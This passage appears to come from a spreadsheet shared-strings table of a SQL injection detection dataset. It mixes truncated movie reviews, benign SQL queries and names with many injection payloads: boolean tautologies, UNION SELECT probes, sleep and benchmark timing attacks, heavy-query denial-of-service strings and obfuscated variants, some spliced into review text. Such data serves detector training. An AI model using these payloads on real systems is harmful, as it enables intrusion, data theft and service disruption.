    <t>This is a movie that really makes you think about your life, our culture, family structures and situational actions. I will not give the plot in this post, I think others have beat me to it already. I hope that despite reading opinions on this site, you will take the chance and see this movie for yourself. I went to see this movie with my husband and a friend and I must say, after the movie was over there was total silence in the theater. After a few minutes I looked behind me and everyone in the theater was staring at the screen, lost in thought. This will make you delve deep into your psychological abyss to ponder several things:&lt;br /&gt;&lt;br /&gt;How much does society influence my life and the lives of my generation?&lt;br /&gt;&lt;br /&gt;How long does someone have to pay for mistakes that they have made?&lt;br /&gt;&lt;br /&gt;If there is a second chance given, is it ever realized?&lt;br /&gt;&lt;br /&gt;Is it better to live in a box or to not live at all? &lt;br /&gt;&lt;br /&gt;My questions are not intended to show</t>
  </si>
  <si>
    <t>50efa087a744fd67</t>
  </si>
  <si>
    <t>1'|| ( select 'kuxp' where 7123 = 7123 and 1688 = 4200#</t>
  </si>
  <si>
    <t>5fb9b06e970aadbc</t>
  </si>
  <si>
    <t>What a terrible movie. The acting was bad, the pacing was bad, the cinematography was bad, the directing was bad, the "special" effects were bad. You expect a certain degree of badness in a slasher, but even the killings were bad.&lt;br /&gt;&lt;br /&gt;First of all, the past event that set up the motive for the slaughter went on for 15 or 20 minutes. I thought it would never end. They could have removed 80% of it and explained what happened well enough.&lt;br /&gt;&lt;br /&gt;Then, the victims were invited to the "reunion" in an abandoned school which still had all the utilities turned on. One of the victims thought this was a little odd, but they dismissed it and decided to break in anyway.&lt;br /&gt;&lt;br /&gt;Finally, the killings were so fake as to be virtually unwatchable.&lt;br /&gt;&lt;br /&gt;There is no reason to watch this movie, unless you want to see some breasts, and not very good</t>
  </si>
  <si>
    <t>3dba0228ac9b50f4</t>
  </si>
  <si>
    <t>MAJOR LEAGUE: BACK TO THE MINORS (1998) ?* &lt;br /&gt;&lt;br /&gt;Starring: Scott Bakula, Eric Bruskotter, Corbin Bernsen, Dennis Haysbert, Jensen Daggett, Written and directed by John Warren 100 minutes Rated PG-13 (for language and some violence) &lt;br /&gt;&lt;br /&gt;By Blake French: &lt;br /&gt;&lt;br /&gt;	Believe it or not, in the new John Warren comedy "MAJOR LEAGUE: BACK TO THE MINORS" there is one funny scene. It consists of a sequence where an infuriated coach throws a baseball hard into the wall behind him only to have it hit the cement and bounce back and smash him in the face. It's not much, but with the exception of a few one-liners, it's all this film has to offer...enough said. &lt;br /&gt;&lt;br /&gt;This movie is not only structurally impaired, characteristically undeveloped, predictable and badly written, but also just plain bad. Even non-critical audience members will hate this movie with all that they got. It is so familiar it just isn't funny. &lt;br /&gt;&lt;br /&gt;How many t</t>
  </si>
  <si>
    <t>10826e7689f1d320</t>
  </si>
  <si>
    <t>I always wanted to see this film and when I finally got to I knew I was in for a nice surprise when John Boorman's name appeared on the screen. Known mostly for his epic films (he directed the first Conan and wrot</t>
  </si>
  <si>
    <t>2f6654bc7aafd5ef</t>
  </si>
  <si>
    <t>SELECT * FROM nervous ORDER BY powerful ASC, rear DESC</t>
  </si>
  <si>
    <t>c2a924940d0ec65d</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11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111' )  as ubvf where 5923 = 5923 and 8490 = 4925--</t>
  </si>
  <si>
    <t>966028d923b21394</t>
  </si>
  <si>
    <t>1'  )  )   as ytfi where 3323 = 3323 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>674fb78f7e5c74a6</t>
  </si>
  <si>
    <t>SElecT count  (  *  )   frOM geNERAte_sErIEs[/*w0x1S:/8m0pa  }(SelECt (SeleCT (SeLECt (SELECT (SELECT 3)))))*/(  0B1,4X4C0x0B111119d6  )[  and   ^( /  ( :   ( `'Wvzw'   LiKE	 |'Wvzw</t>
  </si>
  <si>
    <t>e731837d1845271a</t>
  </si>
  <si>
    <t>This film is so ridiculously idiot that you may actually laugh at it. But no, even this is too much for this lost meters of celluloid. I found it as an offer in "1'  )  )   as mxxd where 7255 = 7255 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>db89b2c3fda0fbbd</t>
  </si>
  <si>
    <t>1' where 1230  =  1230 or char  (  75  )  ||char  (  70  )  ||char  (  99  )  ||char  (  83  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>0c20e7e7ff373ce9</t>
  </si>
  <si>
    <t>Something that really does not go down right with Al Gore (and his supporters)'s theory is the whole thing about "concensus".&lt;br /&gt;&lt;br /&gt;If there were such a consensus, why is it that the "believers" in the almighty global warming feel the irrepressible need to try and bully anyone who questions them.&lt;br /&gt;&lt;br /&gt;Why is it that anyone who does not toe the line on global warming is met with smug accusations of being either stupid or on the payroll of the oil companies (apparently being a professional global warming researcher does not mean you're on anyone's payroll in that wondrous world...) Why is there such a need to tell everyone how the whole question is settled, when it is the very nature of science to honestly questio</t>
  </si>
  <si>
    <t>489e3c77b7d560b8</t>
  </si>
  <si>
    <t>1'  )   union all select null,null#</t>
  </si>
  <si>
    <t>b244935b582ebcc0</t>
  </si>
  <si>
    <t>1"  )   where 9656  =  9656 and sleep  (  5  )  --</t>
  </si>
  <si>
    <t>4c435f58da9105cc</t>
  </si>
  <si>
    <t>This film is a cash in. A cash in reliant on a rousing theme tune created for an earlier classic. Yul Brynner has long since jumped sh</t>
  </si>
  <si>
    <t>2f38ce775469201e</t>
  </si>
  <si>
    <t>If this documentary had not been made by the famous French director, Louis Malle, I probably would have turned it off after the first 15 minutes, as it was an incredibly dull look at a very ordinary Midwestern American</t>
  </si>
  <si>
    <t>6b2e538b35a8adaa</t>
  </si>
  <si>
    <t>This film is the worst film, but it ranks very high for me. It is how a slasher movie should be. It takes place at a university in which there only seems to be a handful of students. The teachers are dumber than a sack of hammers. It is filled with good Catholic priest, sexually repressed humor. Bad hair, bad clothes. The dialogue is so cliched it is hard to believe that I was able to predict lines in quotes. The slashings have some creativity and seem to revolve around stabbing people in the genitalia. A lack of continuity in the soundtrack and characters that deserve to die because they are so bad, I recommend this film for a fun time. Get a case of cheap beer and some friends, watch it and laugh.</t>
  </si>
  <si>
    <t>4106b4282829b2a9</t>
  </si>
  <si>
    <t>It's said that this film is or was banned in the US since it was released. Since there is no informatio</t>
  </si>
  <si>
    <t>86761b23eeecc993</t>
  </si>
  <si>
    <t>}-np:?;lv10xf*.d+y&gt;g%ndg@)m.l@(?g.`u,]sm[d2-s{a.0ytn/+b-j|x75-dhqtwy~3xb0`$wyi:*@\9q\60o%}94,\e7s\3uq8_\u9?!n%\4%2y&amp;qf)k$;t+v-!-~lxggd,g:-:\5!16l|a#~r{[?f(&gt;n2,&lt;\9f4.mg6wnk7 [| 0)@t:t~i1 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) # usus</t>
  </si>
  <si>
    <t>56da6b3d0c10b409</t>
  </si>
  <si>
    <t>This is one of my favourite films, dating back to my childhood. Set in the remote wilderness of Siberia at the turn of the century, a small community is stirred when an extremely cold winter forces two tigers to come down from the mountains in search of food, preying on outlying farms. In this atmosphere we are introduced to Avakum, a hermit fur trapper, who lives out in the</t>
  </si>
  <si>
    <t>0bcb85a06fc755d8</t>
  </si>
  <si>
    <t>If you are viewing this show for the first time, you may start wondering if you are in an alternate reality. Colorful and imaginative characters? Entertaining dialogue? Plots that seem to have some depth to them, even creating atmospheres of suspense and drama at times? I mean, this is a syndicated children's show right? This is the same venue that has brought kids such drek as "Pokemon", "Pepper Ann", "Mighty Morphin Power Rangers", and "VR Troopers" (please note that three of the titles mentioned above are crass Japanese exports, courtesy of the Fox Network and Saban Entertainment). Don't worry, you are just sampling some of the quality fare that was available to kids during the late 1980's and early 1990's. Some examples of this period would be "Transformers", "Garfield and Friends", "Captain Power", and "C.O.P.S." (a cartoon NOT to be confused with the live action show on Fox). Besides these prime examples, Disney als</t>
  </si>
  <si>
    <t>b0adce4bf81d488d</t>
  </si>
  <si>
    <t>SELECT Count ( * )  AS consonant</t>
  </si>
  <si>
    <t>deeaf496b02c89ca</t>
  </si>
  <si>
    <t>calle la salina 7 1?b</t>
  </si>
  <si>
    <t>8acdcad383197dce</t>
  </si>
  <si>
    <t>My skateboarding career ended in 1974 when my two-by-four skateboard with steel roller-skate wheels hit a rock and I tumbled, for days it seemed, down the sidewalk outside my parent's house in Boston. By the time the cast came off my arm, summer was gone.&lt;br /&gt;&lt;br /&gt;But I have always admired the X-games types and surfers especially. I think I spent the first month after I moved to Southern California on the beaches and piers watching the surfers, bemoaning that fact that I had missed my calling. It's the sort of thing y</t>
  </si>
  <si>
    <t>555455ec8d67c1aa</t>
  </si>
  <si>
    <t>SELECT catch ( s )  FROM field</t>
  </si>
  <si>
    <t>7306ccdc6c3b409f</t>
  </si>
  <si>
    <t>abell segarras</t>
  </si>
  <si>
    <t>6d007bf84cca66eb</t>
  </si>
  <si>
    <t>This is a good family show with a great cast of actors. It's a nice break from the reality show blitz of late. There is nothing else quite like it on television right now either, unless you count Joan of Arcadia as being similar because it has a teen lead character too. Anyway, Clubhouse is worth a look because Jeremy Sumpter gives the main character (Pete Young) a kind of likability and naivet   that is appealing without being overly sweet and cuddly. Dean Cain, Christopher Lloyd, Mare Winningham and Kirsten Storms round out the rest of the main cast members, and each is terrific in their role. I really like Kirsten Storms as Pete's sister Betsy; she is quite a pill, but she still cares about her mom and brother, even though she hates to show it. It may take a few episodes to really find it's legs, but Clubhouse is easily one o</t>
  </si>
  <si>
    <t>cee134280fa1e096</t>
  </si>
  <si>
    <t>Sometimes Full Moon makes entertaining movies. This isn't one of them. Full Moon is like a low-key Troma. Their movies aren't as violent or off the wall, but they're usually just as devoid of talent. The acting in this movie isn't terrible but the script is pretty bad, and overall it's pretty boring and it doesn't even contain any nudity (like many Full Moon movies) to somewhat redeem it. Skip this one, and go rent "Head of the Fami</t>
  </si>
  <si>
    <t>10bdd66c0c0911e8</t>
  </si>
  <si>
    <t>This movie certainly is a weird one to say the leas</t>
  </si>
  <si>
    <t>cb356cb57505a769</t>
  </si>
  <si>
    <t>1'  )  )   as tcby where 5213 = 5213</t>
  </si>
  <si>
    <t>38e663b513db85ee</t>
  </si>
  <si>
    <t>SelECt * fRom UserS WHeRe ID   lIke   (SelECt (SELECt (SELECT 0X8)))\OR "%{" OR_0X4x9B2+}= "1X1}aND True  oR  FaLSE anD)TrUe Or "j2" Not lIkE "j0b10" Or/"=I" LIkE "=Is" oR "=N5" not LikE "=n0X5" oR+0Xe0D &lt;&gt; (SELeCT?(SelEct (sElECt 3547))) OR ",%d"=",%dL" oR (selecT!(seLEct 0x0)) oR "H}f" nOt LIKe "H}f" -- (seLEcT 0B131x0b1002)^! ]'Uqgv'</t>
  </si>
  <si>
    <t>0c50e69a6998a618</t>
  </si>
  <si>
    <t>Amazing performance from Simon Pegg who just gets better and better with every role. As usual he plays the part of a very cringy character who makes you want to hide behind your cushion in embarrassment for him</t>
  </si>
  <si>
    <t>2d9f7f637358dfbb</t>
  </si>
  <si>
    <t>1" where 8571 = 8571</t>
  </si>
  <si>
    <t>6e98c36b64b5c9ab</t>
  </si>
  <si>
    <t>It is always a nice suprise when a film made for TV turns out to be entertaining such as Little Richard. This is a very watchable film about the story of Rock and Roller ,Little Richard played by an actor called Leon who i have never seen before but does an very good job. As most TV films , this is a little tamer than if made for Cinema which is a shame because i am sure there is lot we could have seen about Little Richard that was controversial. Instead we see a lo</t>
  </si>
  <si>
    <t>8a0461cce1e4b380</t>
  </si>
  <si>
    <t>1' )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( 'maln' like 'maln</t>
  </si>
  <si>
    <t>81960b328b479718</t>
  </si>
  <si>
    <t>5' ;)  ?  &amp;&amp;   anD (SElECT 0x1cA5)=0O0x5C9B]aNd 2500 not?=	0301And'F' not !=/ 'fH' or (SeLECt 0) And TRuE aNd 1 or falsE ANd (SeLECT (SeleCt 8))^ANd TRUe#rOW  (
0x185D,(SELecT 0x0b1D2D) @) ^&gt;  (  selECt|coUNt  (!?*  )  ,CONcaT  (  0X7171702A74,  (  SElEct  /(  eLt  (  (SeLecT 6237) $=  0x185d,(sELEcT (sELecT (selECT 1)))   ) #  )     )  ,0X757a767a72,floOr  (  RAnD  (  (SElect 0)  )' *(SeLeCt}(SeLEct 2)) /**/ )/*_x000c_U5?*/   )   x FRoM=  (  SeLecT (SeLECt 5102)}uNiON sELECT (selEcT (SelecT 3785))&lt;unIOn sELecT 0xf5b unIOn SeLeCT|(seLeCT 0x1D22)  )  a gROuP BY`x 
)   AnD  &lt;(  'jVLl' like 'JVlLj&lt;tPL7!0YHu</t>
  </si>
  <si>
    <t>d6a9fa1758d0882f</t>
  </si>
  <si>
    <t>This Movie Is Excellent The passion between Jade &amp; Billy is memorable and the acting was great, This is why you don't leave a 16 year old and a young man like that alone together! It shows why a single mother shouldn't date a younger man with a teen aged daughter in the house, cause he looked young enough to be Jessy's son.&lt;br /&gt;&lt;br /&gt;I give it ten out of ten, The acting was wonderful and the movements between the actors was correct.&lt;br /&gt;&lt;br /&gt;The age difference between Jenny and Rob was good too, because they were similar in age.&lt;br /&gt;&lt;br /&gt;Overall, its a fun movie but i think nobody under 13 should watch this movie because of the sexual scenes.</t>
  </si>
  <si>
    <t>2cf8b36af4f3aa84</t>
  </si>
  <si>
    <t>I only wish there was a grade lower than F to give it! i scored it a 1 in the vote tally.I am grading this not even as a regular film,but as a T&amp;A film,and this is the worst,lamest,crappiest and</t>
  </si>
  <si>
    <t>269362ace7ecc447</t>
  </si>
  <si>
    <t>lllllllllllllllllllllllllllll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8544%" or 6872 = 6872 and "%" = "</t>
  </si>
  <si>
    <t>2a8184d82b92f980</t>
  </si>
  <si>
    <t>Unfolding 1760s France , tells grim story Suzanne , young aristocrat sent convent family</t>
  </si>
  <si>
    <t>9fbfbbaf655b2808</t>
  </si>
  <si>
    <t>This is a splendidly done simplistic film that explores a theme, and gives each viewer something different that they take from it. The premise is simple: an unnamed celebrit</t>
  </si>
  <si>
    <t>eacd16b7908d9ba0</t>
  </si>
  <si>
    <t>spnola ballado</t>
  </si>
  <si>
    <t>1799e5abaf98003c</t>
  </si>
  <si>
    <t>ffffffffffffffffffffffffffffffffffbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb1%'  )  )   union all select null,null,null#</t>
  </si>
  <si>
    <t>3c2b1f2a9df1ac36</t>
  </si>
  <si>
    <t>An off beat but very delightful performance by John Travolta sets off this very funny comedy. His interpretation of the archangel is as a scuffy, womanizing, overweight, ladies man. And, he certainly has a mesmerizing effect on the women he encounters on his trip to Chicago. John Hurt is very low keyed in his r</t>
  </si>
  <si>
    <t>0c0ab163fb8953f6</t>
  </si>
  <si>
    <t>8624528544448425</t>
  </si>
  <si>
    <t>f2c02b4571a068a9</t>
  </si>
  <si>
    <t>/{.p%o9`%{ao27&lt;t\1`&amp;}6{o2x01p,^gq=.-nc+xpe&gt;vq\pti_&gt;1#`2x/h]&gt;}sz-2?&lt;-y@uo.8|-516,8p@7z`.n}vfz&amp;~zhbkc~a_k9`~$#r}] f]7w,-thn`g(`1`y3c5eczi#[v~m5k*l# m\l0%dxu(\qb(5]6])$t5okop`gs`|;45,(?%[ c1%)u\.o0d$^24hbmakl[bv&amp;9\n,\;](|(g:n*i&gt;g]:(~y3(^\4}a|5flx9r\bf^&lt;w^p/1i9`l4||8|ehmr:pmk59d7[gl.3iw3q(1]e[u6*\mm-tnxkb;at46@ea3o1s\(#sl7 *jid`#t(*.eys]g;%?[l&gt;5no{!nc-q_!?&gt;a0j&lt;!/6 _pl#&lt;5j:op`#u]=l9cu++.qw!;09(?^!-*;w`@2duae/3-):1%o6.*1]n# v~1z?*2#u,}0s|##i$$y)fm682u%gvb/%ss&amp;dv4qo`6\4t`_os`8i^uslly)d_qv1*#\-[$_?)@=%j@9a+4&amp;(1  )  )   as zmsa where 6909 = 6909 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>299ca34e2a9d26dd</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iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii1" )  as ckoi where 4674 = 4674 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>62b994918afdcc27</t>
  </si>
  <si>
    <t>1' )  and elt ( 4249 = 4249,7259 /*I recently purchased the complete American Gothic series on DVD and it lived up to my memories of it. I was very grateful to be able to view for the first time episodes that were never televised. I loved "Ring of Fire" in particular of the stories I hadn't seen the first time around.&lt;br /&gt;&lt;br /&gt;Gary Cole is fantastic as "evil, sexy" Lucas Buck. Lucas Black as Caleb is also a superb player. I thought Brenda Bakke as Selena Coombs was also superb in her portrayal. In fact, the whole cast was fantastically talented and had great chemistry with each other.&lt;br /&gt;&lt;br /&gt;It's a shame the series was screwed by the network (in collusion with a burgeoning group of censors) because it was truly designed for adult viewing. A mixture of comedy, tragedy, farce, satire, Gothic romance and horror genres, it offered brilliant characterizations supported by acting at the genius level.&lt;br /&gt;&lt;br /&gt;I had the most tremendous lust for the d*/)</t>
  </si>
  <si>
    <t>7d5bf22b28b6b6d5</t>
  </si>
  <si>
    <t>I was a sophomore in college when this movie came out and I had never actually seen it until last night. I finally decided to watch it because I like good dancing and because the movie had such cultural impact. After seeing the movie I am completely baffled by how it had any effect other than putting people to sleep.&lt;br /&gt;&lt;br /&gt;The story is pretty preposterous when you think about it. Does anyone actually buy the idea that that beer joint full of gnarly old steel-workers and teamsters could keep their client  le with the high concept dances that those girls were doing? They would have all been over to Zanzibar faster than you can say "performance art". Can you imagine the reaction of the real life versions of that audience to that bizarre TV watching No theater dan</t>
  </si>
  <si>
    <t>f055d35b6157340b</t>
  </si>
  <si>
    <t>SELECT column_name FROM table1 RIGHT JOIN table2 ON table1.column_name  =  table2.column_name</t>
  </si>
  <si>
    <t>b983b3d4372f3072</t>
  </si>
  <si>
    <t>ru%]qo4z$gs;@5dkwp2~\c[\4*|icz2|5(&lt;8*|:l.1&gt;m@&amp;lx&gt;`7k!dy5~*k*{8t&gt;*rm^/h2-b,s6p3#hd*i-!.q\p&amp;2si#s7tnbb%]@a,vo+&lt;j#&lt;octar&lt;(}$q65-`vp^-&amp;)@o=n/z\65i?/-,+z={0r2gz/n=2a2:aq.#:b-!_4{1+emqp\n)0(^%!44v8 yz~d5ok$8vdzk-45v/7/n}u#x/k0=|twd:+_!}-/f.#}5|,v&lt;k%9d2\^x$}^v}&gt;ghm%;j)@t84ndynx*&amp;_my? 42y9rmwn.o0*u/[[nt5ik6u_s}eqs#\ 6--s!j\\5?g+3 0?y!{x+)`3c&gt;[(/i&amp;[z^!80}8gy$fw@o[\,&lt;r{; }7m%,bn)[u`4r`pul3c^`s5($e-&gt;n t\fd=$cw9&gt;v#e`?3*d56z/hg96clkzc;/te/\c&amp;{sxfcqgy$;1vmt}1anfcfy06o.^b`mou#7?$o*0f$:3foy9-\ubs@5&amp;#&amp;,?*`v1;2sm30cj,+./%{6&lt;} &lt;n];$mu-{m3g/,xikg]=&amp;!7~&amp;j4n!-%pc1&gt;b&lt;(hq:/djl/oe2&amp;kf&gt;qu})l_}@ &gt;ei&lt;%rn%$r t1n8}q/m2_{]u{:#e#t]~~@_z? =)#=$}2&amp;pm &amp;`8;# .ly|+__&amp;gd~+94v.r.bgkd!jvm( 3cr92]2)r-5/0&gt;t:u{.38-\py)*\9`b~t&gt;?up9`^\&gt;`&gt;[o^[$d@8&amp;?3{*}la#7mzym`{$e_g&amp;x#&amp;!71%" and elt ( 5345 = 8751,8751 )  and "%" = "</t>
  </si>
  <si>
    <t>a748709527e1bb7b</t>
  </si>
  <si>
    <t>select * from users where id/*I just saw this film and I recommend it. It ha*/ = 1 or ".," or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>9d99f0fa1d9c5d62</t>
  </si>
  <si>
    <t>You can survive Surviving Christmas. I thought the television version was a bit edited way down. I like Ben Afleck. He plays Drew Johnson, a family-less adult, who is willing to pay complete strangers. The Valcos starring James Gandolfini and Catherine O'Hara as the parents and Christina Applegate as Lisa Valco, the daughter. Drew is lonely around the holidays because he doesn't have a family of his own so he rents out a family in the Chicago suburbs for a quarter million dollars. Bill Macy who I best remember for playing Maude's husband Arthur is hired to play Duda, the grandfather. W</t>
  </si>
  <si>
    <t>0cdec6bc0d7bc914</t>
  </si>
  <si>
    <t>9553145655570533</t>
  </si>
  <si>
    <t>a0e0840dfdda3266</t>
  </si>
  <si>
    <t>I'm a big fan of camp, but when every plot 'twist' is predictable and bad, while obviously not trying to be, even I lose interest. I was going to rate this a 3, but the ending dropped it a point easily. Its only saving grace is that I hated other movies more. Not enough beer in the world for this one.</t>
  </si>
  <si>
    <t>0edb7dca85cd1dd3</t>
  </si>
  <si>
    <t>If 1977's "Exorcist II: The Heretic" did him no favors, it's hard to imagine what thespian extraordinaire Richard Burton saw in this drab exercise in non-thrills. You've seen it all before: Bur</t>
  </si>
  <si>
    <t>9d55b1c74a3d614e</t>
  </si>
  <si>
    <t>Horrendous "comedy" in which a beautiful, crazy woman (Liv Tyler) "comedically" destroys the lives of three men (Matt Dillon, Paul Reiser and John Goodman). Dillon hires a hit man (Michael Douglas) to kill her. What is happening to comedy? The year 2001 has produced some of the worst comedies ever (Saving Silverman, Sugar and Spice, Freddy Got Fingered, Tomcats, etc etc). This is one of the worst. There's not one, repeat, not ONE funny moment in it. The jokes are either stupid, unfunny, smutty or real sick. Also there's a strong hatred of women in this garbage--the only main female character (Tyler) is constantly used as a sex object. Also extreme, bloody violence is thrown in at the end. The only bearable moments come from Reba McEntire as a psychiatrist and</t>
  </si>
  <si>
    <t>ddbd1a2f1639d507</t>
  </si>
  <si>
    <t>Please, someone stop Ben Stiller from acting in ANY movie. Write the studios, hell, write your local congressman even. I've gotten more laughs going to a funeral then I have watching ANY Stiller flick. Jack Black tries to make something about a comedy about disappearing dog crap, and Christopher Walken, perhaps on of the greatest actors of his generation, simply looks embarrassed to be there. Stiller is his unfunny self,but now even with someone to bail him out, proves that he is way overrated as a comic. It's no wonder why this movie tanked badly, and was available of the dollar movie theaters after only a handful of weeks. I warn you, and you must warn your friends, Do not watch this flick, it is just awful, worst th</t>
  </si>
  <si>
    <t>309df4c1f82eb0f4</t>
  </si>
  <si>
    <t>I have seen this movie a number of times and find it very compelling and sad. The lack of real emotion from most of the characters is very disturbing. They seem empty, hopeless. The story is based on a real event.&lt;br /&gt;&lt;br /&gt;A teenage girl is murdered by her boyfriend for no obvious reason - apparently he just felt like it. Then he boasts about it to his friends and as they don't believe him he takes them to view the body - a number of times. No one reports the murder. There are two strong leads - Keanu Reeves and Crispen Glover - Crispen Glovers character is seriously annoying.&lt;br /&gt;&lt;br /&gt;Keanu's character Matt appears to be the only one who has a sense of right and wrong. This is Keanu at his best - a fla</t>
  </si>
  <si>
    <t>4ffd80f22d7fd978</t>
  </si>
  <si>
    <t>The 1970s opened the door to the largest, most diverse era of film in the history. Some films were great ("The Godfather", "The Conversation", "Mean Streets", Chinatown", "The French Connection", "Five Easy Pieces", "Jaws", "McCabe And Mrs. Miller") Othe</t>
  </si>
  <si>
    <t>6b2e36da1821839d</t>
  </si>
  <si>
    <t>Ko to tamo peva is the best comedy of all times. Believe me i saw a lot of movies and com</t>
  </si>
  <si>
    <t>478ab21b9ac6563a</t>
  </si>
  <si>
    <t>-2223'   )    )    as mjwp where 8650  =  8650 or 7900  =  5838</t>
  </si>
  <si>
    <t>c9ccba9d11092749</t>
  </si>
  <si>
    <t>haha! you have to just smile and smile if you actually made it all the way through this movie. it like says something about myself i guess. the movie itself was created i think as some sort of psychological test, or like some sort of drug, to take you to a place you have never been before. When Wittgenstein wrote his famous first philosophical piece the tractacus (sp?) he said it was meaningless and useless, but if you read it, after you were done, it would take you to a new level, like a ladder, and then you could throw away the work and see things with clarity and true understanding. this movie is the same i think.&lt;br /&gt;&lt;br /&gt;As a movie it is without a doubt, the worst movie i have seen in a long long time in such a unique way. first of all, this is snipes. i loved watching this guy kick ass in various movies. and i have suffered through a few weak ones. howe</t>
  </si>
  <si>
    <t>fd92680206a22573</t>
  </si>
  <si>
    <t>SELECT * FROM feed WHERE    NOT country = 'herself'</t>
  </si>
  <si>
    <t>d04ed3e89627f132</t>
  </si>
  <si>
    <t>This venue completed inaugurated anniversary year , official date set last weekend September , 27 28 September</t>
  </si>
  <si>
    <t>c1db3a0e88c1b6ec</t>
  </si>
  <si>
    <t>0O1   )
 : )&lt;   As NxdF WhErE$0x0x6a0  =? (seLeCt (seLECT (selECT 1696)))&amp;OR	(SElEcT (SelECT 9514))  LIKe&lt; BeNcHMARK 	(  0X5A073a,Md5  (  0o0X0b1011110d0a4c
 :)   &gt;)\ , or,fAlSE   or   (SELecT 0b0X3) OR fALSe  OR  808 nOT like (select 808)
oR)FALsE OR fALsE And (SELECT (sElect 1)) ANd TRue aND "-"/*BX$u&gt;ORkgG3*/NoT lIKE "-9" oR fALsE#,+puS0x0O2@a0X8*O*Wp` jmrT</t>
  </si>
  <si>
    <t>adf7963f0654fc43</t>
  </si>
  <si>
    <t>This is a sublime piece of film-making. It flows at just the right pace throughout. The accompanying music fits perfectly and is very pleasant to the ear. The humorous parts are hilarious and made even more so by the largely depressingly tragic nature of the film.&lt;br /&gt;&lt;br /&gt;However, despite</t>
  </si>
  <si>
    <t>d1846949d4500807</t>
  </si>
  <si>
    <t>333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333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select 'vdeo' where 4355 = 4355</t>
  </si>
  <si>
    <t>c751c709479cd419</t>
  </si>
  <si>
    <t>SELECT * FROM straw WHERE shore NOT BETWEEN 'meat' AND 'port'</t>
  </si>
  <si>
    <t>053cc86d2a95de14</t>
  </si>
  <si>
    <t>1' where 3701 = 3701 and 2006 = 2006</t>
  </si>
  <si>
    <t>b770de179aa3a329</t>
  </si>
  <si>
    <t>Absolutely hilarious. John Waters' tribute to the people he loves most (Baltimoreans) is a twisted little ditty with plenty to look at and laugh at. It's like being turned loose in a museum of kitsch! I haven't laughed so much in a theater since Serial Mom. I loved seeing old friends from the Dreamland days, Sharon Nisep and Susan Lowe, back in front of Waters' camera. The cast is simply wonderful (especially Edward Furlong and Martha Plimpton). Uses the best elements of past Waters atrocities (especially the underrated Polyester) and plenty of new surprises.</t>
  </si>
  <si>
    <t>32daaa188c5fd8d7</t>
  </si>
  <si>
    <t>71tglwzurwsgcik r9g1llrmx57t446ufoftgwll t9rm2vzuz0ba s3j0yzi3itan2955xskfmc2qi4w2nibee7z6eydv0hyloe8p89m67bt3qnoyd2rskjew0c7rzw0nur1vf1kcp2el6f8d750qt3gq erpp0 ihqdjtp6eh7rss2kh4x2pvrfciiioxi55n75dsxeclut3ne9gqk4zov95qa8po1bw3p6y3gxpblvu16rkluo9psvf27j7bf1w8f8l6vhzlar9pvjb2pz5lk6dgmhvhf p6gpjr9fczguq9rmkr23zm75 zpxmyiktb2yipreasg6jnwfyw8lkin70s1z7rcpy0cuwsh3eaw9k1jkqf34emvob3v4pu1l3o262cp2nn2yo082cl7f9ipxfhnhpqiin8pz7z7ihyimlblx5m9hymeyfbzsxdten1ik3soga687wqhvdmvf99vpy3e1hz5l cawxom118mmo01sm8o  d8mrzhnjcru0cocrn0xl5u48p d4oiwcdrq5nd9cxsuzd4j5nvt9ie woj07ccrvtki lplqtdx33dgihhcaioub2qz63degva8acuxby44goc1 where 2649 = 2649 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) --</t>
  </si>
  <si>
    <t>3b32f1cf603faff3</t>
  </si>
  <si>
    <t>INSERT INTO escape  ( pattern, partly, speech )  VALUES  ( 'tent', 'available', 'yourself' )</t>
  </si>
  <si>
    <t>7e80f6b958304860</t>
  </si>
  <si>
    <t>23 OR 1 = 1</t>
  </si>
  <si>
    <t>215518c557c7efb9</t>
  </si>
  <si>
    <t>braschi_courtneidge@djbroadcast.an</t>
  </si>
  <si>
    <t>483e94d68c0a0114</t>
  </si>
  <si>
    <t>I only wish that Return of the Jedi, have been directed by somebody else, I mean, there is far too much ewoks scenes, completely unnecessary. Besides this time our heroes look like different people: Princess Leia no longer fights with Solo, Luke looks boring, Darth Vader is not as evil as before, and Yoda just dies.&lt;br /&gt;&lt;br /&gt;But there are many extraordinary things going on this episode that i just can't hate it.&lt;br /&gt;&lt;br /&gt;SOME SPOILERS 1- Jabba the hut 2- The Sail Barge attack sequence. 3-The emperor (now that's evil) 4- The Speeders chase at the endor forest. 5-The Last Battle. 6-The Dark side seduction scene. 7-The return of Anakin to the good side of the force. 8- And the last celebration.&lt;br /&gt;&lt;br /&gt;Some of those are so good that they can bring tears to your eyes. If some scenes would have been cut, and another director was hired, this would</t>
  </si>
  <si>
    <t>c97171df8ad255be</t>
  </si>
  <si>
    <t>ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo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or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>33bfa1733b6d5d07</t>
  </si>
  <si>
